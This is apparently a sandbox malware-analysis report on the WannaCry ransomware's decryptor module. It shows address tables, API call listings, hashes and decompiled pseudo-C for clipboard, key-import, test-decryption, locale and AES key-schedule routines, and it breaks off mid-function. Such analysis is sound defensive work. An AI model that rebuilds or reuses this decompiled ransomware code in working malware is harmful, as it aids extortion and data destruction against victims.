                                                      0x0040b538
                                                      0x0040b53a
                                                      0x0040b541
                                                      0x0040b549
                                                      0x0040b54a
                                                      0x0040b54b
                                                      0x0040b53a
                                                      0x0040b555
                                                      0x0040b559
                                                      0x0040b55f
                                                      0x0040b56f
                                                      0x0040b56f
                                                      0x0040b571
                                                      0x0040b57b
                                                      0x0040b57f
                                                      0x0040b581
                                                      0x0040b589
                                                      0x0040b58a
                                                      0x0040b590
                                                      0x0040b512
                                                      0x00000000
                                                      0x0040b592
                                                      0x0040b599
                                                      0x0040b599
                                                      0x00000000
                                                      0x0040b590
                                                      0x0040b5a5
                                                      0x0040b5ab
                                                      0x0040b5af
                                                      0x0040b5b4
                                                      0x0040b5b5
                                                      0x00000000
                                                      0x0040b5b5
                                                      0x0040b50e
                                                      0x0040b41d
                                                      0x0040b429
                                                      0x0040b42b
                                                      0x0040b42f
                                                      0x0040b435
                                                      0x0040b4c5
                                                      0x0040b4cc
                                                      0x0040b43b
                                                      0x0040b43b
                                                      0x0040b43f
                                                      0x0040b440
                                                      0x0040b443
                                                      0x0040b44b
                                                      0x0040b44f
                                                      0x00000000
                                                      0x00000000
                                                      0x0040b457
                                                      0x0040b45b
                                                      0x0040b461
                                                      0x0040b461
                                                      0x0040b467
                                                      0x0040b46e
                                                      0x0040b476
                                                      0x0040b477
                                                      0x0040b478
                                                      0x0040b467
                                                      0x0040b482
                                                      0x0040b488
                                                      0x0040b48e
                                                      0x0040b49e
                                                      0x0040b49e
                                                      0x0040b4a0
                                                      0x0040b4aa
                                                      0x0040b4b0
                                                      0x0040b4b2
                                                      0x0040b4b4
                                                      0x0040b4b5
                                                      0x0040b4b9
                                                      0x0040b4bf
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040b4bf
                                                      0x0040b4d8
                                                      0x0040b4de
                                                      0x0040b4e2
                                                      0x0040b4e7
                                                      0x0040b4e8
                                                      0x00000000
                                                      0x0040b4e8
                                                      0x0040b435
                                                      0x0040b417
                                                      0x0040b40a
                                                      0x00000000

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
                                                      • Instruction ID: 0dbcc5357461fba905cfbac0272349747bc27b8ce320a87ccfe5983878451c5e
                                                      • Opcode Fuzzy Hash: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
                                                      • Instruction Fuzzy Hash: 7A61D5316043158BC705DE2998919ABB7E6FFC8704F04497EFC89BB345C738AA06CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00407C30(void* __ecx) {
                                                      				int _t9;
                                                      				void* _t15;
                                                      				void* _t22;
                                                      				signed int _t25;
                                                      				signed int _t26;
                                                      				void* _t39;
                                                      				void* _t40;
                                                      
                                                      				_t39 = __ecx;
                                                      				_t9 = OpenClipboard( *(__ecx + 0x20));
                                                      				if(_t9 == 0) {
                                                      					return _t9;
                                                      				} else {
                                                      					_t22 = GlobalAlloc(2,  *((intOrPtr*)( *(_t39 + 0x508) - 8)) + 1);
                                                      					if(_t22 != 0) {
                                                      						EmptyClipboard();
                                                      						_t40 =  *(_t39 + 0x508);
                                                      						_t15 = GlobalLock(_t22);
                                                      						_t25 =  *((intOrPtr*)(_t40 - 8)) + 1;
                                                      						_t26 = _t25 >> 2;
                                                      						memcpy(_t15, _t40, _t26 << 2);
                                                      						memcpy(_t40 + _t26 + _t26, _t40, _t25 & 0x00000003);
                                                      						GlobalUnlock(_t22);
                                                      						SetClipboardData(1, _t22);
                                                      						return CloseClipboard();
                                                      					}
                                                      					return CloseClipboard();
                                                      				}
                                                      			}











                                                      APIs
                                                      • OpenClipboard.USER32(?), ref: 00407C38
                                                      • GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
                                                      • CloseClipboard.USER32 ref: 00407C5B
                                                      • EmptyClipboard.USER32 ref: 00407C66
                                                      • GlobalLock.KERNEL32(00000000), ref: 00407C79
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00407C92
                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
                                                      • CloseClipboard.USER32 ref: 00407CA1
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$Global$Close$AllocDataEmptyLockOpenUnlock
                                                      • String ID:
                                                      • API String ID: 142981918-0
                                                      • Opcode ID: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                                      • Instruction ID: 8252ba06fde5d142781bbccc432981ef86be9671d894a3679d09edf034c0945c
                                                      • Opcode Fuzzy Hash: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                                      • Instruction Fuzzy Hash: 1D014B71740A05DFD714ABA5EC8DAFBB7A9FB88356B908079F54AC3350CF61AC048B64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 47%
                                                      			E004047C0(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
                                                      				long* _v8;
                                                      				char _v20;
                                                      				void _v539;
                                                      				char _v540;
                                                      				char _v543;
                                                      				char _v544;
                                                      				intOrPtr _v548;
                                                      				char _v552;
                                                      				int _v556;
                                                      				intOrPtr _v560;
                                                      				void* __ebx;
                                                      				char _t38;
                                                      				void* _t45;
                                                      				void* _t48;
                                                      				intOrPtr _t63;
                                                      				intOrPtr _t67;
                                                      				signed int _t76;
                                                      				unsigned int _t78;
                                                      				signed int _t79;
                                                      				long* _t85;
                                                      				char _t92;
                                                      				void* _t116;
                                                      				intOrPtr _t118;
                                                      				void* _t120;
                                                      				void* _t121;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(0x415e38);
                                                      				_push(0x413050);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t118;
                                                      				_t63 = __ecx;
                                                      				_v560 = __ecx;
                                                      				_t38 = "TESTDATA"; // 0x54534554
                                                      				_v552 = _t38;
                                                      				_t67 =  *0x420c64; // 0x41544144
                                                      				_v548 = _t67;
                                                      				_t92 =  *0x420c68; // 0x0
                                                      				_v544 = _t92;
                                                      				_v543 = 0;
                                                      				_v540 = 0;
                                                      				memset( &_v539, 0, 0x7f << 2);
                                                      				_t120 = _t118 - 0x21c + 0xc;
                                                      				asm("stosw");
                                                      				asm("stosb");
                                                      				asm("repne scasb");
                                                      				_v556 = 0xbadbac;
                                                      				if(E004046B0(_t63) == 0) {
                                                      					L6:
                                                      					 *[fs:0x0] = _v20;
                                                      					return 0;
                                                      				} else {
                                                      					_v8 = 0;
                                                      					_t45 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 8, _a4);
                                                      					_t121 = _t120 + 0xc;
                                                      					if(_t45 == 0) {
                                                      						L12:
                                                      						_push(0xffffffff);
                                                      						_push( &_v20);
                                                      						goto L5;
                                                      					} else {
                                                      						_t76 = _a8;
                                                      						_t48 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 0xc, _t76);
                                                      						_t121 = _t121 + 0xc;
                                                      						if(_t48 == 0) {
                                                      							goto L12;
                                                      						} else {
                                                      							asm("repne scasb");
                                                      							_t78 =  !(_t76 | 0xffffffff);
                                                      							_t116 =  &_v552 - _t78;
                                                      							_t79 = _t78 >> 2;
                                                      							memcpy(_t116 + _t79 + _t79, _t116, memcpy( &_v540, _t116, _t79 << 2) & 0x00000003);
                                                      							_t121 = _t121 + 0x18;
                                                      							_push(0x200);
                                                      							_push( &_v556);
                                                      							_push( &_v540);
                                                      							_push(0);
                                                      							_push(1);
                                                      							_push(0);
                                                      							_push( *((intOrPtr*)(_t63 + 8)));
                                                      							if( *0x4217cc() != 0) {
                                                      								_t85 =  *(_t63 + 0xc);
                                                      								if(CryptDecrypt(_t85, 0, 1, 0,  &_v540,  &_v556) != 0) {
                                                      									asm("repne scasb");
                                                      									if(strncmp( &_v540,  &_v552,  !(_t85 | 0xffffffff) - 1) != 0) {
                                                      										_v8 = 0xffffffff;
                                                      										E004049A6(_t63);
                                                      										goto L6;
                                                      									} else {
                                                      										_push(0xffffffff);
                                                      										_push( &_v20);
                                                      										L00413056();
                                                      										 *[fs:0x0] = _v20;
                                                      										return 1;
                                                      									}
                                                      								} else {
                                                      									_push(0xffffffff);
                                                      									_push( &_v20);
                                                      									goto L5;
                                                      								}
                                                      							} else {
                                                      								_push(0xffffffff);
                                                      								_push( &_v20);
                                                      								L5:
                                                      								L00413056();
                                                      								goto L6;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}





























                                                      APIs
                                                        • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
                                                        • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                                        • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                                        • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
                                                      • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
                                                      • _local_unwind2.MSVCRT ref: 004048EB
                                                      • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00404920
                                                      • strncmp.MSVCRT(00000000,?), ref: 00404951
                                                      • _local_unwind2.MSVCRT ref: 00404964
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt_local_unwind2$File$AcquireContextCreateDecryptEncryptSizestrncmp
                                                      • String ID: TESTDATA
                                                      • API String ID: 154225373-1607903762
                                                      • Opcode ID: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
                                                      • Instruction ID: 12943b98363484da7d263465f98eb3331ab271d68fc45af0c4cd497e7be75c93
                                                      • Opcode Fuzzy Hash: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
                                                      • Instruction Fuzzy Hash: 21512DB6600218ABCB24CB64DC45BEBB7B4FB98320F10477DF915A72C1EB749A44CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E004049B0(long* _a4, HCRYPTKEY* _a8, CHAR* _a12) {
                                                      				int _v8;
                                                      				char _v20;
                                                      				long _v32;
                                                      				int _v36;
                                                      				long _v40;
                                                      				void* _v44;
                                                      				long _t24;
                                                      				int _t28;
                                                      				BYTE* _t35;
                                                      				void* _t46;
                                                      				long _t51;
                                                      				intOrPtr _t53;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(0x415e48);
                                                      				_push(0x413050);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t53;
                                                      				_v44 = 0xffffffff;
                                                      				_v32 = 0;
                                                      				_v36 = 0;
                                                      				_v8 = 0;
                                                      				_t46 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
                                                      				_v44 = _t46;
                                                      				if(_t46 == 0xffffffff) {
                                                      					L10:
                                                      					_push(0xffffffff);
                                                      					goto L11;
                                                      				} else {
                                                      					_t24 = GetFileSize(_t46, 0);
                                                      					_t51 = _t24;
                                                      					_v40 = _t51;
                                                      					if(_t51 != 0xffffffff) {
                                                      						if(_t51 <= 0x19000) {
                                                      							_t35 = GlobalAlloc(0, _t51);
                                                      							_v36 = _t35;
                                                      							if(_t35 == 0) {
                                                      								goto L10;
                                                      							} else {
                                                      								if(ReadFile(_t46, _t35, _t51,  &_v32, 0) != 0) {
                                                      									_t28 = CryptImportKey(_a4, _t35, _v32, 0, 0, _a8);
                                                      									_push(0xffffffff);
                                                      									if(_t28 == 0) {
                                                      										L11:
                                                      										_push( &_v20);
                                                      										goto L12;
                                                      									} else {
                                                      										_push( &_v20);
                                                      										L00413056();
                                                      										 *[fs:0x0] = _v20;
                                                      										return 1;
                                                      									}
                                                      								} else {
                                                      									_push(0xffffffff);
                                                      									_push( &_v20);
                                                      									goto L12;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_push(0xffffffff);
                                                      							_push( &_v20);
                                                      							goto L12;
                                                      						}
                                                      					} else {
                                                      						_push(_t24);
                                                      						_push( &_v20);
                                                      						L12:
                                                      						L00413056();
                                                      						 *[fs:0x0] = _v20;
                                                      						return 0;
                                                      					}
                                                      				}
                                                      			}
















                                                      APIs
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                                      • _local_unwind2.MSVCRT ref: 00404AC7
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CreateSize_local_unwind2
                                                      • String ID:
                                                      • API String ID: 1039228802-0
                                                      • Opcode ID: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
                                                      • Instruction ID: 027920ce5e1762b5ae47f20262b5a931ea28e629a989eecbafe96ff87ad0b853
                                                      • Opcode Fuzzy Hash: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
                                                      • Instruction Fuzzy Hash: 723153B1A40219BBDB10DF98DC84FFFB6ACE789771F14472AF525A22C0D33859018B68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 85%
                                                      			E00406C20(void* __ecx) {
                                                      				void _v51;
                                                      				void* _v52;
                                                      				signed int _t14;
                                                      				void* _t26;
                                                      				char* _t30;
                                                      				unsigned int _t36;
                                                      				signed int _t37;
                                                      				void* _t55;
                                                      
                                                      				_t26 = __ecx;
                                                      				_v52 = 0;
                                                      				memset( &_v51, 0, 0xc << 2);
                                                      				asm("stosb");
                                                      				_t14 = GetUserDefaultLangID();
                                                      				_t30 =  &_v52;
                                                      				if(GetLocaleInfoA(_t14 & 0x0000ffff, 0x1001, _t30, 0x32) == 0) {
                                                      					asm("repne scasb");
                                                      					_t36 =  !(_t30 | 0xffffffff);
                                                      					_t55 = "English" - _t36;
                                                      					_t37 = _t36 >> 2;
                                                      					memcpy(_t55 + _t37 + _t37, _t55, memcpy( &_v52, _t55, _t37 << 2) & 0x00000003);
                                                      				}
                                                      				if(SendMessageA( *(_t26 + 0x80), 0x158, 0,  &_v52) != 0xffffffff) {
                                                      					SendMessageA( *(_t26 + 0x80), 0x14d, 0,  &_v52);
                                                      					return E00406AE0(_t26);
                                                      				} else {
                                                      					SendMessageA( *(_t26 + 0x80), 0x14e, 0, 0);
                                                      					return E00406AE0(_t26);
                                                      				}
                                                      			}












                                                      APIs
                                                      • GetUserDefaultLangID.KERNEL32 ref: 00406C3B
                                                      • GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
                                                      • SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
                                                      • SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
                                                        • Part of subcall function 00406AE0: #540.MFC42(?,767B20C0), ref: 00406B03
                                                        • Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
                                                        • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
                                                        • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
                                                        • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
                                                        • Part of subcall function 00406AE0: #800.MFC42(?,?,767B20C0), ref: 00406B62
                                                        • Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
                                                        • Part of subcall function 00406AE0: GetFileAttributesA.KERNEL32(?), ref: 00406B7D
                                                        • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
                                                        • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
                                                        • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
                                                        • Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,767B20C0), ref: 00406BC4
                                                        • Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
                                                        • Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$MessageSend$#537#924sprintf$#3874#540AttributesDefaultFileInfoLangLocaleUser
                                                      • String ID: English
                                                      • API String ID: 600832625-3812506524
                                                      • Opcode ID: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                                      • Instruction ID: 12cb8a10269d81aa60d086da51d7e65d8080bc449a50ca3d57c6290c1d86febe
                                                      • Opcode Fuzzy Hash: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                                      • Instruction Fuzzy Hash: F911D3717402006BEB149634DC42BAB7795EBD4720F54863EFE5AEB2D0D9F8A8098794
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E0040A150(void* __ecx) {
                                                      				void* _t170;
                                                      				void* _t177;
                                                      				unsigned int _t178;
                                                      				intOrPtr _t182;
                                                      				signed int _t189;
                                                      				signed int _t190;
                                                      				signed int _t192;
                                                      				signed int* _t198;
                                                      				signed int* _t203;
                                                      				signed int _t214;
                                                      				signed int* _t215;
                                                      				signed int _t224;
                                                      				void* _t236;
                                                      				unsigned int _t238;
                                                      				signed int _t239;
                                                      				signed int _t245;
                                                      				signed int _t251;
                                                      				void* _t268;
                                                      				void* _t275;
                                                      				signed int _t276;
                                                      				void* _t278;
                                                      				signed int _t290;
                                                      				int _t292;
                                                      				signed int _t293;
                                                      				signed int _t317;
                                                      				signed int _t321;
                                                      				signed int _t337;
                                                      				signed int _t353;
                                                      				signed int _t355;
                                                      				intOrPtr* _t375;
                                                      				signed int _t378;
                                                      				void* _t385;
                                                      				void* _t386;
                                                      				void* _t387;
                                                      				signed int _t388;
                                                      				signed int* _t390;
                                                      				void* _t391;
                                                      				void* _t392;
                                                      				signed int _t395;
                                                      				signed int* _t397;
                                                      				intOrPtr _t398;
                                                      				void* _t399;
                                                      				void* _t403;
                                                      
                                                      				_t236 = __ecx;
                                                      				if( *((intOrPtr*)(_t399 + 4)) == 0) {
                                                      					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
                                                      					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                                      					_push(0x41c9c0);
                                                      					_push(_t399 + 8);
                                                      					L004130FC();
                                                      				}
                                                      				_t170 =  *(_t399 + 0x20);
                                                      				if(_t170 != 0x10 && _t170 != 0x18 && _t170 != 0x20) {
                                                      					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
                                                      					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                                      					_t170 = _t399 + 8;
                                                      					_push(0x41c9c0);
                                                      					_push(_t170);
                                                      					L004130FC();
                                                      				}
                                                      				_t238 =  *(_t399 + 0x24);
                                                      				if(_t238 != 0x10 && _t238 != 0x18 && _t238 != 0x20) {
                                                      					 *((intOrPtr*)(_t399 + 0x18)) = 0x4213b4;
                                                      					_t238 = _t399 + 0xc;
                                                      					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                                      					_push(0x41c9c0);
                                                      					_push(_t399 + 8);
                                                      					L004130FC();
                                                      				}
                                                      				 *(_t236 + 0x3c8) = _t170;
                                                      				 *(_t236 + 0x3cc) = _t238;
                                                      				_t290 = _t238;
                                                      				_t385 =  *(_t399 + 0x20);
                                                      				_t19 = _t236 + 0x3d0; // 0x424
                                                      				_t239 = _t238 >> 2;
                                                      				memcpy(_t19, _t385, _t239 << 2);
                                                      				_t386 = memcpy(_t385 + _t239 + _t239, _t385, _t290 & 0x00000003);
                                                      				_t22 = _t236 + 0x3f0; // 0x444
                                                      				_t245 =  *(_t236 + 0x3cc) >> 2;
                                                      				memcpy(_t386 + _t245 + _t245, _t386, memcpy(_t22, _t386, _t245 << 2) & 0x00000003);
                                                      				_t403 = _t399 + 0x30;
                                                      				_t177 =  *(_t236 + 0x3c8);
                                                      				if(_t177 == 0x10) {
                                                      					_t178 =  *(_t236 + 0x3cc);
                                                      					if(_t178 != 0x10) {
                                                      						asm("sbb eax, eax");
                                                      						_t182 = ( ~(_t178 - 0x18) & 0x00000002) + 0xc;
                                                      					} else {
                                                      						_t182 = 0xa;
                                                      					}
                                                      					 *((intOrPtr*)(_t236 + 0x410)) = _t182;
                                                      				} else {
                                                      					if(_t177 == 0x18) {
                                                      						asm("sbb ecx, ecx");
                                                      						 *((intOrPtr*)(_t236 + 0x410)) = ( ~( *(_t236 + 0x3cc) - 0x20) & 0xfffffffe) + 0xe;
                                                      					} else {
                                                      						 *((intOrPtr*)(_t236 + 0x410)) = 0xe;
                                                      					}
                                                      				}
                                                      				asm("cdq");
                                                      				_t292 = 0;
                                                      				_t251 =  *(_t236 + 0x3cc) + (_t290 & 0x00000003) >> 2;
                                                      				 *(_t403 + 0x2c) = _t251;
                                                      				if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
                                                      					L23:
                                                      					_t293 = 0;
                                                      					if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
                                                      						L28:
                                                      						_t44 = _t236 + 0x414; // 0x468
                                                      						_t387 = _t44;
                                                      						asm("cdq");
                                                      						_t353 = ( *((intOrPtr*)(_t236 + 0x410)) + 1) * _t251;
                                                      						 *(_t403 + 0x30) = _t353;
                                                      						_t189 =  *(_t403 + 0x24);
                                                      						_t395 =  *(_t236 + 0x3c8) + (_t293 & 0x00000003) >> 2;
                                                      						 *(_t403 + 0x10) = _t395;
                                                      						if(_t395 <= 0) {
                                                      							L31:
                                                      							_t388 = 0;
                                                      							if(_t395 <= 0) {
                                                      								L35:
                                                      								if(_t388 >= _t353) {
                                                      									L51:
                                                      									_t190 = 1;
                                                      									 *(_t403 + 0x30) = 1;
                                                      									if( *((intOrPtr*)(_t236 + 0x410)) <= 1) {
                                                      										L58:
                                                      										 *((char*)(_t236 + 4)) = 1;
                                                      										return _t190;
                                                      									}
                                                      									_t151 = _t236 + 0x208; // 0x25c
                                                      									_t397 = _t151;
                                                      									do {
                                                      										if(_t251 <= 0) {
                                                      											goto L57;
                                                      										}
                                                      										_t390 = _t397;
                                                      										_t355 = _t251;
                                                      										do {
                                                      											_t192 =  *_t390;
                                                      											 *(_t403 + 0x24) = _t192;
                                                      											_t390 =  &(_t390[1]);
                                                      											_t355 = _t355 - 1;
                                                      											 *(_t390 - 4) =  *0x004191B0 ^  *0x004195B0 ^  *0x004199B0 ^  *(0x419db0 + (_t192 & 0x000000ff) * 4);
                                                      										} while (_t355 != 0);
                                                      										_t251 =  *(_t403 + 0x2c);
                                                      										L57:
                                                      										_t190 =  *(_t403 + 0x30) + 1;
                                                      										_t397 =  &(_t397[8]);
                                                      										 *(_t403 + 0x30) = _t190;
                                                      									} while (_t190 <  *((intOrPtr*)(_t236 + 0x410)));
                                                      									goto L58;
                                                      								}
                                                      								 *(_t403 + 0x28) = 0x41a1b0;
                                                      								do {
                                                      									 *(_t403 + 0x24) =  *(_t236 + 0x410 + _t395 * 4);
                                                      									 *(_t236 + 0x414) =  *(_t236 + 0x414) ^ ((( *0x00416FB0 ^  *( *(_t403 + 0x28))) << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
                                                      									 *(_t403 + 0x28) =  *(_t403 + 0x28) + 1;
                                                      									if(_t395 == 8) {
                                                      										_t104 = _t236 + 0x418; // 0x46c
                                                      										_t198 = _t104;
                                                      										_t268 = 3;
                                                      										do {
                                                      											 *_t198 =  *_t198 ^  *(_t198 - 4);
                                                      											_t198 =  &(_t198[1]);
                                                      											_t268 = _t268 - 1;
                                                      										} while (_t268 != 0);
                                                      										 *(_t403 + 0x24) =  *(_t236 + 0x420);
                                                      										_t275 = 3;
                                                      										 *(_t236 + 0x424) =  *(_t236 + 0x424) ^ (( *0x00416FB0 << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
                                                      										_t116 = _t236 + 0x428; // 0x47c
                                                      										_t203 = _t116;
                                                      										do {
                                                      											 *_t203 =  *_t203 ^  *(_t203 - 4);
                                                      											_t203 =  &(_t203[1]);
                                                      											_t275 = _t275 - 1;
                                                      										} while (_t275 != 0);
                                                      										L46:
                                                      										 *(_t403 + 0x24) = 0;
                                                      										if(_t395 <= 0) {
                                                      											goto L50;
                                                      										}
                                                      										_t119 = _t236 + 0x414; // 0x468
                                                      										_t375 = _t119;
                                                      										while(1) {
                                                      											_t251 =  *(_t403 + 0x2c);
                                                      											if(_t388 >=  *(_t403 + 0x30)) {
                                                      												goto L51;
                                                      											}
                                                      											_t398 =  *_t375;
                                                      											asm("cdq");
                                                      											_t375 = _t375 + 4;
                                                      											_t276 = _t388 / _t251;
                                                      											asm("cdq");
                                                      											_t317 = _t388 %  *(_t403 + 0x2c);
